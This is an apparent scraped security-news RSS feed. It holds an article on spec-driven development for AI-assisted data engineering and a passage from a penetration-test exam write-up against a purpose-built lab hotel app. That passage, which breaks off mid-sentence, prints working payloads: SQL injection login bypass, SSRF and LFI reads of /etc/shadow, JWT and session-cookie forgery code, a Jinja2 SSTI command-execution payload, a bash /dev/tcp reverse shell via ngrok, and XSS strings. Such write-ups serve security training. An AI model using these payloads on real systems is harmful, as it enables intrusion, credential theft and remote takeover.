href="https://1200km.com/">https://1200km.com/</a><br>Medium: <a href="https://medium.com/@1200km">https://medium.com/@1200km</a><br>GitHub: <a href="https://github.com/anpa1200">https://github.com/anpa1200</a><br>LinkedIn: <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></p><p>Andrey Pautov</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=057c9b4b9394" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe coding can build your pipeline. It can't explain it six months later]]></title>
<description><![CDATA[AI coding agents are rapidly accelerating data engineering by generating transformations, pipelines, orchestration workflows, validation tests, and infrastructure configurations from prompts. However, enterprise data platforms have long operated across fragmented systems owned by different teams ...]]></description>
<link>https://tsecurity.de/de/3599700/it-nachrichten/vibe-coding-can-build-your-pipeline-it-cant-explain-it-six-months-later/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599700/it-nachrichten/vibe-coding-can-build-your-pipeline-it-cant-explain-it-six-months-later/</guid>
<pubDate>Mon, 15 Jun 2026 18:17:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI coding agents are rapidly accelerating data engineering by generating transformations, pipelines, orchestration workflows, validation tests, and infrastructure configurations from prompts. </p><p>However, enterprise data platforms have long operated across fragmented systems owned by different teams and built on different technologies. As these systems evolve independently, organizations increasingly struggle with inconsistent business logic, duplicated implementations, difficult downstream impact analysis, and hidden dependencies across the platform. </p><p>The rise of vibe coding can further amplify these problems as more operational context, architectural decisions, and business knowledge become scattered across prompts, conversations, generated code, and disconnected workflows rather than becoming part of the system itself.</p><p>Spec-driven development (SDD) is emerging as one approach to address this challenge. In SDD, prompts, business rules, validation logic, orchestration behavior, and implementation workflows are converted into executable and versioned specifications that become part of the system itself. These specifications act as persistent operational memory for both humans and <a href="https://venturebeat.com/orchestration/mcp-solved-tool-calling-a2a-solved-coordination-what-solves-transport">AI agents</a>, allowing systems to evolve more consistently across releases, teams, and AI-assisted workflows.</p><p>Because enterprise data engineering already relies heavily on reusable patterns, metadata-driven pipelines, and standardized operational workflows, it is especially well-suited for SDD. By combining AI-assisted generation with deterministic and reusable system contracts, SDD may provide a new operational layer for reducing fragmentation and improving long-term coordination across increasingly AI-generated data platforms.</p><h2><b>Vibe coding alone lacks persistent system memory </b></h2><p>Vibe coding works remarkably well for generating isolated implementations quickly. But prompts are inherently temporary. They capture an engineer’s assumptions, business context, implementation logic, and system knowledge only for that specific conversation and moment in time.</p><p>In practice, making <a href="https://venturebeat.com/technology/agentic-ai-solved-coding-and-exposed-every-other-problem-in-software-engineering">AI-generated systems</a> work often requires far more than a simple prompt. Engineers continuously provide background information, architectural decisions, business rules, schema assumptions, downstream dependencies, operational constraints, debugging history, and implementation guidance throughout the development process.</p><p>These contexts become the real operational knowledge behind AI-assisted development.</p><p>However, in most vibe coding workflows, this information remains scattered across prompts, conversations, Jira tickets, documentation, chat history, generated code, and disconnected workflows rather than becoming part of the system itself.</p><p>This creates a major problem for enterprise data engineering because modern data platforms are naturally fragmented across many interconnected systems, including ingestion pipelines, warehouses, orchestration frameworks, semantic layers, APIs, dashboards, and machine learning (ML) systems. As more logic and context become embedded inside prompts and generated implementations, organizations gradually lose visibility into:</p><ul><li><p>architectural intent</p></li><li><p>downstream dependencies</p></li><li><p>validation assumptions</p></li><li><p>operational behavior</p></li><li><p>business context behind implementations</p></li></ul><p>Over time, the system itself no longer contains the full reasoning behind how it was built. Critical business context, architectural assumptions, and operational knowledge still largely exist inside human judgement and scattered conversations rather than inside the platform itself. </p><p>Vibe coding makes implementation significantly faster, but from a system perspective, overall engineering efficiency does not improve proportionally because much of the development lifecycle still depends on human validation, domain knowledge, coordination, and decision-making.</p><p>More importantly, prompts are not naturally iterable engineering artifacts. Enterprise systems continuously evolve across releases, schema changes, business logic updates, and downstream dependencies. Teams repeatedly revisit and refine systems over time, but prompts are optimized for fast local generation rather than system long-term evolution.</p><p>They are difficult to:</p><ul><li><p>version consistently</p></li><li><p>validate systematically</p></li><li><p>reuse across teams</p></li><li><p>coordinate through CI/CD workflows</p></li><li><p>evolve incrementally over time</p></li></ul><p>Even the same prompt may not reliably generate the same implementation with different context in the future.</p><p>This is where SDD begins to move to the center of AI-assisted data engineering. Instead of leaving operational knowledge scattered across prompts and conversations, SDD integrates business context, validation logic, transformation behavior, orchestration requirements, and implementation workflows directly into executable specifications that become part of the system itself.</p><p>The system now has persistent memory about how it was designed, why certain decisions were made, and how different components are connected across the platform. This allows teams and <a href="https://venturebeat.com/orchestration/when-claude-changed-everything-changed-managing-ai-blast-radius-in-production">AI agents</a> to iterate systems more reliably over time while reducing fragmentation across increasingly distributed data environments.</p><h2><b>Spec-driven development turns prompts into system memory</b></h2><p>In SDD, systems are built around executable specifications rather than loosely coordinated prompts and implementations alone. Instead of treating specifications as passive documentation written after development, SDD treats them as operational contracts that directly drive code generation, validation, testing, orchestration, and deployment workflows.</p><p>In many ways, SDD extends ideas from Infrastructure-as-Code and GitOps into AI-assisted engineering. Specifications combine declarative system definitions with executable implementation workflows. The declarative layer provides system context, schemas, dependencies, constraints, and operational requirements, while workflow-oriented instructions guide AI agents on how to implement and evolve the system consistently.</p><p>Once these contexts, rules, and implementation patterns are converted into persistent and versioned contracts stored in repositories and integrated into CI/CD workflows, the system becomes significantly more iterable and governable over time. These specifications effectively become long-term system memory for both humans and AI agents, allowing systems to evolve consistently across releases, teams, and increasingly AI-assisted development workflows.</p><p>In practice, the structure of specifications largely depends on the type of systems and workflows being implemented. However, spec-driven systems often begin with a foundational “constitution” that defines project-wide principles and constraints that should remain consistent across the platform, such as technology standards, naming conventions, architectural rules, governance policies, and core system requirements. On top of this foundation, multiple layers of specifications serve different operational purposes across the development lifecycle:</p><ul><li><p>schema specifications define structural compatibility</p></li><li><p>transformation specifications define business logic</p></li><li><p>validation specifications define quality rules</p></li><li><p>orchestration specifications define execution behavior</p></li><li><p>semantic specifications define shared business definitions</p></li><li><p>AI workflow specifications define reusable implementation instructions for coding agents</p></li></ul><p>A simplified specification might look like this:</p><p><i>pipeline_spec:</i></p><p><i>  source:</i></p><p><i>    system: mysql</i></p><p><i>    table: order</i></p><p><i>  transformation:</i></p><p><i>    logic:</i></p><p><i>      - load_strategy: scd2</i></p><p><i>  target:</i></p><p><i>    platform: snowflake</i></p><p><i>    table: dim_order</i></p><p><i>  validation:</i></p><p><i>    primary_key: order_id</i></p><p>Additional workflow files can then provide reusable implementation instructions for coding agents:</p><ol><li><p>Generate Python ingestion code for Salesforce customer data.</p></li><li><p>Generate DBT models implementing Type 2 SCD logic.</p></li><li><p>Generate Airflow workflows for hourly execution.</p></li><li><p>Generate validation tests for downstream compatibility.</p></li></ol><p>These specification documents are often maintained as markdown-based operational artifacts generated and refined through AI-assisted workflows. Engineers can iteratively update the specifications, provide additional business context, and collaborate with coding agents to improve implementation logic, workflows, and prompt instructions over time. Compared to traditional documentation processes, AI-assisted specification generation is significantly faster and more adaptive.</p><p>The important shift is not simply better documentation. Specifications become reusable operational context that allows systems to evolve consistently across releases, teams, and AI-assisted workflows. Architectural intent, business assumptions, and implementation logic no longer disappear into temporary prompts and disconnected implementations, but instead become persistent system knowledge integrated directly into the development lifecycle.</p><h2><b>Why spec-driven development specifically fits data engineering </b></h2><p>SDD can theoretically be applied across many areas of software engineering, but data engineering is especially well-suited for this model because of the nature of modern data platforms.</p><p>Enterprise data systems naturally span many interconnected technologies and layers, including transactional systems, ingestion frameworks, streaming platforms, warehouses, orchestration systems, semantic layers, APIs, dashboards, and ML pipelines. Data engineers regularly work across long technology stacks and distributed systems where a single upstream change can impact many downstream consumers.</p><p>Enterprise data platforms also support many different teams and applications across fragmented environments. As systems evolve independently, understanding the full downstream impact of an upstream schema or business logic change becomes increasingly difficult. A seemingly small modification can silently break downstream pipelines, dashboards, APIs, semantic models, or machine learning workflows across the platform.</p><p>SDD can address this fragmentation by introducing shared and versioned operational contracts across systems. Because schemas, dependencies, validation rules, transformation logic, and orchestration behavior are explicitly defined within specifications, teams and AI agents gain much better visibility into how systems are connected and how changes propagate across the platform.</p><p>Additionally, the goal of data engineering is not simply delivering pipelines quickly. Teams must also optimize for system stability, scalability, consistency, maintainability, operational reliability, and infrastructure cost.</p><p>This requires significant system and solution design work from engineers. Teams must define tech stack, create schemas, transformation patterns, orchestration behavior, validation rules, storage strategies, and downstream compatibility requirements carefully across the platform.</p><p>However, once these architectural and operational patterns are established, much of the implementation work becomes highly repetitive and standardized.</p><p>For example, after defining a reusable ingestion and transformation pattern for Salesforce customer data, onboarding a new table may only require adding another table definition into the specification, while the remaining implementation can be generated automatically through existing specifications and workflows that follow the same operational pattern:</p><p><i>source:</i></p><p><i>  system: salesforce</i></p><p><i>  tables:</i></p><p><i>    - customer</i></p><p><i>    - order</i></p><p><i>    - product</i></p><p>From this specification alone, coding agents could generate new data pipelines following the same governed implementation pattern across the platform. This combination of human-driven architectural design and highly repeatable implementation workflows makes data engineering particularly suitable for SDD.</p><p>In many ways, data engineering has always been moving toward higher levels of automation, from ETL frameworks and metadata-driven pipelines to IaC and declarative orchestration systems. SDD represents another step in that evolution by combining prompt-based AI generation with deterministic and versioned operational contracts.</p><p>Instead of relying entirely on temporary conversational prompts or rigid template systems, SDD introduces a middle layer where reusable specifications provide structure, coordination, validation, and persistent system memory for AI-assisted development.</p><h2><b>How SDD changes AI-assisted data engineering</b></h2><p>SDD introduces a much higher level of automation into enterprise data engineering while also helping reduce the fragmentation problems that modern data platforms increasingly face.</p><p>Because schemas, business rules, transformation behavior, orchestration requirements, validation logic, and downstream dependencies are explicitly defined inside reusable specifications, coding agents can generate and evolve large portions of the implementation consistently across the platform. Instead of repeatedly rebuilding pipelines and workflows from temporary prompts and disconnected context, teams can iterate systems through shared operational contracts and reusable implementation patterns.</p><p>This significantly improves consistency, traceability, and coordination across distributed environments. Schema evolution becomes easier to manage, downstream impact becomes more visible, and systems can evolve incrementally instead of through disconnected generations of implementations.</p><p>At the same time, human engineers still remain essential in the development lifecycle. While AI agents can automate large portions of implementation work, human judgement is still critical for defining business logic, designing architectures, managing tradeoffs, validating correctness, and coordinating system evolution across organizations.</p><p>As more implementation work becomes AI-generated, the role of data engineering also begins shifting. Engineers spend less time writing repetitive pipelines and orchestration logic, and more time defining specifications, designing reusable operational patterns, managing validation rules, and coordinating business context across systems.</p><p>This may also gradually reduce some of the traditional boundaries between different data engineering teams. Because implementation becomes increasingly standardized and AI-assisted through shared specifications, organizations may rely less on highly siloed platform-specific implementation teams and more on shared operational contracts and reusable system patterns.</p><p>Ultimately, SDD shifts data engineering toward a more specification-oriented and system-oriented model where humans focus on intent, architecture, and business coordination, while AI agents increasingly handle implementation, testing, and operational generation at scale.</p><p><i>Shuhua Xu is a lead data engineer.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[My Instructor Said “You Can’t Get a Shell.” I Got Root. — Full Web Pentest Exam Write-Up]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsDisclosure Notice: This assessment was conducted as a formal practical examination under the supervision of MilliSec LLC. The target applicationVanguardCorp Hotel Management System — was a purpose-built CTF/...]]></description>
<link>https://tsecurity.de/de/3599548/hacking/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599548/hacking/my-instructor-said-you-cant-get-a-shell-i-got-root-full-web-pentest-exam-write-up/</guid>
<pubDate>Mon, 15 Jun 2026 17:25:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9bh_vFeJ1vSgMartVf7EoA.png"></figure><h4><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br><strong>GitHub:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></h4><blockquote><strong><em>Disclosure Notice:</em></strong><em> This assessment was conducted as a formal practical examination under the supervision of MilliSec LLC. The target application<br>VanguardCorp Hotel Management System — was a purpose-built CTF/exam environment deployed specifically for this assessment on May 24, 2026. No real user data was involved. All exploitation was performed within an isolated lab network. This write-up is published strictly for educational purposes.</em></blockquote><h3>The Setup</h3><p>Before the exam started, my instructor — the person who built the target application from scratch — looked me in the eye and said:</p><blockquote>“You can’t get a shell from this site. I haven’t left that kind of vulnerability.”</blockquote><p>5 minutes later, I had a root shell.</p><p>Not a www-data shell. Not a limited user. Root. uid=0(root). The web application process itself was running as the system's superuser, which meant the moment I achieved code execution, I owned the entire machine at the highest possible privilege level.</p><p>This is the full story of that exam — every finding, every payload, the complete attack chain, and why a five-vulnerability chain starting from a single unauthenticated endpoint ended at full OS compromise.</p><h3>Context</h3><p>This was a practical penetration testing examination conducted at MilliSec LLC on May 24, 2026. The format: black-box. No source code, no credentials, no architecture knowledge. Just an IP address and ten hours.</p><p>The target was the <strong>VanguardCorp Hotel Management System</strong> — a custom-built Flask/Jinja2 web application backed by SQLite and proxied through nginx. The scope covered the full application: authentication, API endpoints, user functionality, administrative panel, and everything in between.</p><p>Parameter Detail Target VanguardCorp Hotel Management System Target IP 82.153.241.96 Attacker IP 10.0.2.5 (isolated lab VM) Technology Stack Python / Flask, Jinja2, SQLite, nginx Assessment Type Black-Box Web Application Penetration Test Assessment Date May 24, 2026 Exclusions Denial of Service; actions beyond demonstration of impact</p><p>The final report documented <strong>ten confirmed vulnerabilities</strong> — five rated Critical, five rated High. CVSS scores ranged from 7.5 to 9.8.</p><p>But the number that mattered most: <strong>1 root shell</strong>.</p><h3>Phase 1: Reconnaissance — Reading the Application</h3><p>The first thing I do on any black-box engagement is just use the application like a normal person. Click everything. Notice what changes in the URL. Watch what headers come back. This phase is slower than running a scanner, but it gives you a mental model that tools can’t.</p><p>The VanguardCorp application presented itself as a hotel management platform: browsable destinations, user registration and login, a booking system, a profile page, reviews, and a legal document section in the footer. The admin panel was accessible at /admin/login.</p><p>Technology fingerprinting gave me:</p><ul><li><strong>Flask</strong> session cookies (identifiable by the eyJ base64 prefix)</li><li><strong>Jinja2</strong> template engine (implied by the Flask stack)</li><li><strong>nginx/1.18.0</strong> reverse proxy on Ubuntu</li><li><strong>SQLite</strong> (confirmed later via LFI)</li><li>A /legal?doc=terms.txt link in the footer — a filename parameter that immediately caught my attention</li></ul><p>That doc parameter is the kind of thing that looks boring on first glance. It isn't.</p><h3>Phase 2: First Blood — SQL Injection on Login</h3><p>The login form was the natural first target. I started with the most fundamental injection test: a single quote in the username field. The application returned a server error rather than a generic “invalid credentials” message — a strong signal that the input was landing directly in a SQL query.</p><h3>F-01 — SQL Injection: Authentication Bypass</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 9.4 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H <br><strong>OWASP</strong> A03:2021 — Injection <br><strong>Affected</strong> /login and /admin/login</p><p>The payload was as simple as it gets:</p><pre>Username: ' OR '1'='1' --<br>Password: anything</pre><p>The application returned a valid authenticated session for the first user record in the database. I applied the same payload to /admin/login.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*Ry1S0bkmF6yes8Z7Jqzg_Q.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*_BarRyDHEw3dQcjG8p-cAQ.png"></figure><p>The redirect landed me on the full administrative control panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*y4frar_fnufqABjbYv8E5Q.png"></figure><p>The admin panel exposed a live dashboard showing registered clients, active properties, total reservations, and gross revenue — plus a full client inquiry log that already contained SQL injection payloads submitted by other testers during prior sessions. I was not the first person to find this.</p><p><strong>Why this works:</strong> The login handler constructs a SQL query by string-concatenating the user-supplied username directly into the query body. The injected OR '1'='1' makes the WHERE clause always evaluate to true, returning the first row in the users table. The -- comment sequence discards everything after it, including the password check.</p><p><strong>Remediation:</strong> Replace dynamic SQL with parameterised queries or prepared statements. One-line fix at the database layer.</p><h3>Phase 3: SSRF — The Application Talks to Itself</h3><p>With admin access established, I turned to the API endpoints. The resort preview functionality accepted a URL parameter and fetched its content server-side — a textbook Server-Side Request Forgery surface.</p><h3>F-02 — Server-Side Request Forgery (SSRF)</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N <br><strong>OWASP</strong> A10:2021 — Server-Side Request Forgery <br><strong>Affected</strong> /api/v1/resort/preview?url= <br><strong>Flags</strong> CTF{SSRF_gives_internal_access} | CTF{SSRF_env_disclosure}</p><p>I directed the server to request its own loopback interface:</p><pre>GET /api/v1/resort/preview?url=http://127.0.0.1/internal/config</pre><p>The server returned its own internal configuration page — exposing the Flask session secret key, the JWT signing secret, and the admin password in a single request.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*e3zI-5p8glPXdoZqE0eTsA.png"></figure><p>A second request to the debug endpoint returned process environment variables:</p><pre>GET /api/v1/resort/preview?url=http://127.0.0.1/debug/env</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*6q10xmYCfjVoGphdwx-Efw.png"></figure><p><strong>Credentials and secrets obtained at this stage:</strong></p><p>Secret Value Admin password VanguardCorpAdmin2026! Flask session secret key vanguard_horizon_secret_2026 JWT signing secret secret</p><p>These three values became the keys to everything that followed.</p><h3>Phase 4: LFI — Reading the Server From the Inside</h3><p>That doc parameter from the footer had been waiting for me. The application served legal documents by reading filenames from the URL — with no path sanitisation whatsoever.</p><h3>F-03 — Local File Inclusion (LFI): Source Code and File Exposure</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 8.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N <br><strong>OWASP</strong> A01:2021 — Broken Access Control <br><strong>Affected</strong> /legal?doc= parameter</p><p>Path traversal payloads worked immediately:</p><pre># System user list<br>GET /legal?doc=%2Fetc%2Fpasswd</pre><pre># Shadow file — root password hash<br>GET /legal?doc=%2Fetc%2Fshadow</pre><pre># Flask source code<br>GET /legal?doc=%2Froot%2Fapp.py</pre><pre># SQLite database<br>GET /legal?doc=%2Froot%2Fvanguard.db</pre><pre># Bash history<br>GET /legal?doc=%2Froot%2F.bash_history</pre><pre># Process environment<br>GET /legal?doc=%2Fproc%2Fself%2Fenviron</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*tm_-3ybVUCE_fQv9kK5zJg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*XIDRmt4ccqobr59e4x6iiA.png"></figure><p>/etc/passwd already told me something critical: the web application process was running as root. That single fact meant that any code execution I achieved would immediately be root-level.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*1zW4wdv77Drefy1Ovy8Dzw.png"></figure><p>The full source confirmed what SSRF had already leaked: app.secret_key = "vanguard_horizon_secret_2026". It also revealed the SSTI vector — but more on that shortly.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*P13mBXSon6ss6em_qPB2iw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1015/1*KpVvFIRAoIqOZ8XrHE52hA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pbJZVCODB0KaVcELsTQ34w.png"></figure><p><strong>Complete file exfiltration summary:</strong></p><p>File Content /etc/passwd Full system user list — process confirmed running as root /etc/shadow Root user password hash exposed /root/app.py Complete Flask source — all routes, secret keys, business logic /root/vanguard.db Full database — all users, invoices, hotel data, credentials /root/.bash_history Server setup commands — confirmed Python/Flask/SQLite stack /proc/self/environ Process environment — additional configuration disclosure</p><p><strong>Remediation:</strong> Validate all filename input server-side. Resolve the absolute path and confirm it sits within the permitted base directory before reading. Never run the web process as root.</p><h3>Phase 5: JWT Forgery — Becoming Superadmin</h3><p>With the JWT signing secret confirmed as secret, forging a privileged token was a one-liner.</p><h3>F-04 — JWT Weak Secret: Token Forgery</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 8.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N <br><strong>OWASP</strong> A02:2021 — Cryptographic Failures <br><strong>Affected</strong> POST /api/v1/token — JWT issuance and verification <br><strong>Flag</strong> CTF{JWT_alg_none_is_never_safe}</p><pre>python3 -c "<br>import jwt<br>payload = {'user_id': 1, 'username': 'admin', 'role': 'superadmin'}<br>token = jwt.encode(payload, 'secret', algorithm='HS256')<br>print(token)<br>"</pre><pre>curl -H "Authorization: Bearer &lt;FORGED_TOKEN&gt;" \<br>  http://82.153.241.96/api/v1/admin/data</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*eQZtPG04rqWgvc1vh3epDw.png"></figure><p>The API returned the full user database and confirmed CTF{JWT_alg_none_is_never_safe}.</p><p><strong>Why this is catastrophic:</strong> A JWT signed with a weak, guessable, or exposed secret is not a security control — it is a signed permission slip that anyone can forge. The moment the secret leaks (via SSRF, LFI, source code, or a disgruntled employee), every JWT-protected endpoint in the application is fully compromised.</p><h3>Phase 6: SSTI — “You Can’t Get a Shell”</h3><p>This is where the exam got interesting.</p><p>The source code I retrieved via LFI contained the profile route:</p><pre>template = """...""" + session["username"] + """..."""<br>return render_template_string(template, ...)</pre><p>The username value from the Flask session cookie was being <strong>concatenated directly into a Jinja2 template string</strong> before rendering. This is Server-Side Template Injection — any Jinja2 expression in the username gets evaluated server-side.</p><p>But to exploit this, I needed two things I already had:</p><ol><li>The Flask session secret key — to forge a signed session cookie with a malicious username</li><li>Code execution context — to run OS commands</li></ol><p>Both were already in my hands from SSRF and LFI.</p><h3>F-05 — Server-Side Template Injection (SSTI): Remote Code Execution</h3><p><strong>Severity</strong> CRITICAL <br><strong>CVSS v3.1</strong> 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H <br><strong>OWASP</strong> A03:2021 — Injection <br><strong>Affected</strong> /profile — Flask session username rendered via render_template_string() <br><strong>Status</strong> Confirmed — RCE achieved as <strong>root</strong></p><p><strong>Step 1: Confirm SSTI</strong></p><p>First, I verified template evaluation with a benign arithmetic payload. I forged a session cookie with username = {{7*7}} using the known Flask secret:</p><pre>from flask import Flask<br>from flask.sessions import SecureCookieSessionInterface</pre><pre>app = Flask(__name__)<br>app.secret_key = "vanguard_horizon_secret_2026"</pre><pre>payload = "{{7*7}}"</pre><pre>s = SecureCookieSessionInterface().get_signing_serializer(app)<br>print(s.dumps({<br>    "role": "admin",<br>    "user_id": 1,<br>    "username": payload,<br>    "verified": True<br>}))</pre><pre>curl -s -b "session=&lt;FORGED_COOKIE&gt;" http://82.153.241.96/profile</pre><p>The profile page rendered <strong>Client Dossier: 49</strong>. Template evaluation confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1016/1*gR7BpOC_81S3kEVWUqyq5w.png"></figure><p><strong>Step 2: RCE via OS command execution</strong></p><p>With SSTI confirmed, I escalated to OS command execution using the Jinja2 config object to access the os module:</p><pre>payload = r"""{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"""</pre><p>The server returned uid=0(root) gid=0(root) groups=0(root).</p><p>My instructor had said shell access was impossible. The server was running as root, and I had code execution.</p><p><strong>Step 3: Reverse shell via ngrok tunnel</strong></p><p>Here is where the real challenge started. My attacker machine was behind NAT — 192.168.0.36 is a private address unreachable from the internet. A standard reverse shell to a local IP would never connect back.</p><p>The solution: tunnel the reverse shell through ngrok, which exposes a local listener to the internet via a public TCP endpoint.</p><p>After configuring ngrok with an auth token and opening a TCP tunnel on port 4444:</p><pre>./ngrok tcp 4444<br># Output: Forwarding tcp://0.tcp.in.ngrok.io:20699 -&gt; localhost:4444</pre><p>With the public ngrok address in hand, I crafted the reverse shell payload. The key was that bash -i &gt;&amp; /dev/tcp/HOST/PORT doesn't resolve domain names natively — it needs a direct IP. I resolved the ngrok address first:</p><pre>nslookup 0.tcp.in.ngrok.io<br># 3.6.231.193</pre><p>Then built the complete forged session cookie with the base64-encoded reverse shell:</p><pre>from flask import Flask<br>from flask.sessions import SecureCookieSessionInterface<br>import base64</pre><pre>app = Flask(__name__)<br>app.secret_key = "vanguard_horizon_secret_2026"</pre><pre>cmd = "bash -i &gt;&amp; /dev/tcp/3.6.231.193/20699 0&gt;&amp;1"<br>b64 = base64.b64encode(cmd.encode()).decode()</pre><pre>payload = "{{config.__class__.__init__.__globals__['os'].popen('echo " + b64 + "|base64 -d|bash').read()}}"</pre><pre>s = SecureCookieSessionInterface().get_signing_serializer(app)<br>print(s.dumps({<br>    "role": "admin",<br>    "user_id": 1,<br>    "username": payload,<br>    "verified": True<br>}))</pre><pre># TAB 1 — Listener<br>nc -lnvp 4444</pre><pre># TAB 2 — Trigger the payload<br>curl -s -b "session=$SHELL_COOKIE" <a href="http://82.153.241.96/profile">http://82.153.241.96/profile</a></pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/975/1*xpB4zFxpc1EIBHCMfZah_A.png"></figure><p>The listener received the connection.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/975/1*vJ0QFox_i3VIY3P8GoDpXg.png"></figure><pre>root@82.153.241.96:~# id<br>uid=0(root) gid=0(root) groups=0(root)<br>root@82.153.241.96:~# whoami<br>root</pre><p><strong>Full OS compromise. As root.</strong></p><p>The web application was running as the system superuser — meaning there was no privilege escalation step required. The moment code execution was achieved via SSTI, I had the highest possible access level on the machine.</p><p><strong>The extra finding here:</strong> A web application should never run as root. Even if SSTI had been patched, a correctly configured server would limit the impact of any future RCE to a low-privilege www-data or application user. Running as root amplifies every code execution vulnerability to full system compromise with zero additional steps.</p><p><strong>Remediation:</strong></p><pre># Vulnerable:<br>return render_template_string("Hello " + session['username'])</pre><pre># Safe:<br>return render_template_string("Hello {{ name }}", name=session['username'])</pre><p>Never concatenate user-controlled data into template strings. Run the web process as a dedicated low-privilege user, never root.</p><h3>Phase 7: The Remaining Findings</h3><p>With the crown jewel secured, I documented the remaining vulnerabilities methodically.</p><h3>F-06 — Stored Cross-Site Scripting (XSS)</h3><p><strong>Severity</strong> HIGH — CVSS 8.2 <br><strong>Affected</strong> Review submission form — rendered in admin panel</p><p>The review form accepted raw HTML without sanitisation. Submitted payloads persisted in the database and executed in the administrator’s browser when viewing the review management page.</p><pre>&lt;img src=x onerror=alert(XSS)&gt;</pre><p><strong>Impact:</strong> An attacker can steal admin session cookies, perform actions on behalf of the administrator, or redirect to phishing pages — all triggered the moment an admin loads the reviews page.</p><h3>F-07 — Reflected Cross-Site Scripting (XSS)</h3><p><strong>Severity</strong> HIGH — CVSS 7.5 <br><strong>Affected</strong> /search?q= parameter</p><p>The search endpoint reflected the q parameter directly into the HTML response without encoding.</p><pre>GET /search?q=&lt;script&gt;alert(XSS)&lt;/script&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n0CBFnDML1ktNBj_nBm06Q.png"></figure><p><strong>Remediation:</strong> Encode all reflected query parameter values before HTML output. Implement a Content Security Policy header.</p><h3>F-08 — Insecure Direct Object Reference (IDOR): Invoice Enumeration</h3><p><strong>Severity</strong> HIGH — CVSS 8.1 <br><strong>Affected</strong> /invoice?invoice_id= parameter</p><p>The invoice endpoint returned records based on a numeric ID without verifying that the requesting user owned the record. Sequential enumeration exposed all invoices across all users.</p><pre>/invoice?invoice_id=1   → my invoice<br>/invoice?invoice_id=2   → Client 1's invoice<br>/invoice?invoice_id=3   → Client 2's invoice<br>...</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kuSSiw5zY3nmrfx9CJbZug.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*s8INoofVNwpWpRrkctvYHA.png"></figure><p><strong>Remediation:</strong> Enforce object-level authorisation on every retrieval. Verify the authenticated user’s ID matches the record owner before returning data.</p><h3>F-09 — Missing Authentication on API Endpoint</h3><p><strong>Severity</strong> HIGH — CVSS 8.6 <br><strong>Affected</strong> DELETE /api/v1/hotels/&lt;id&gt; <br><strong>Flag</strong> CTF{missing_auth_on_api_endpoint}</p><p>The hotel DELETE endpoint performed no authentication or authorisation check. Any unauthenticated client could permanently remove hotel records.</p><pre>curl -X DELETE http://82.153.241.96/api/v1/hotels/1<br># Response: HTTP 200 — hotel record permanently deleted</pre><p><strong>Remediation:</strong> Apply mandatory authentication middleware to all state-mutating API routes (POST, PUT, PATCH, DELETE).</p><h3>F-10 — Sensitive Data Exposure: Hardcoded Secrets</h3><p><strong>Severity</strong> HIGH — CVSS 7.7 <br><strong>Affected</strong> Source code and database exfiltrated via LFI (F-03)</p><p>The source code contained hardcoded Flask secret key and JWT signing secret. The database contained plaintext credentials for all users. These were accessible via LFI and SSRF independently.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZIkGKLV8Ob-h2pc6XsaDjA.png"></figure><p><strong>Credentials exposed:</strong></p><p>Flask session secret key vanguard_horizon_secret_2026 JWT signing secret secret Admin password VanguardCorpAdmin2026! Superadmin password SuperSecret99!</p><p><strong>Remediation:</strong> Never hardcode secrets in source code. Store all sensitive configuration in server-side environment variables. Rotate all exposed credentials immediately.</p><h3>The Complete Attack Chain</h3><p>The ten vulnerabilities do not 